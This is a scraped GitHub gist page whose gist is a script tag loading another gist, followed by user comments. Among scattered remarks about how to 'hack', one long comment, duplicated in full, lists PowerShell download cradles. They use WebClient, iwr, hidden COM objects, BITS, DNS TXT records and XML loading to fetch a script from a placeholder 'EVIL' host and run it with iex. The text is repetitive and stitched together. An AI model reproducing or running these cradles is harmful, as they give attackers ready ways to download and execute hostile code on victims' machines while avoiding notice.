-
-
Save mattn/946330 to your computer and use it in GitHub Desktop.
| <script src=https://gist.github.com/raw/946328/gistfile1.txt ><\/script> |
amalez
commented
Jun 15, 2017
fgfgh
go hakers
how do you do the hack there is no more inspect
There is surley inspect on macOS and windows 8, and check out my gist: <script src="https://gist.github.com/kbatchelli/a4c540f02348477324c75c6611a68a67.js"></script>
uhhhhhhh hey?
how do you even hack
why is the song cradles so good?
normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex
normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex
how do you hack and not feel wrong about it
https://gist.github.com/mattn/946330?permalink_comment_id=2124016#gistcomment-2124016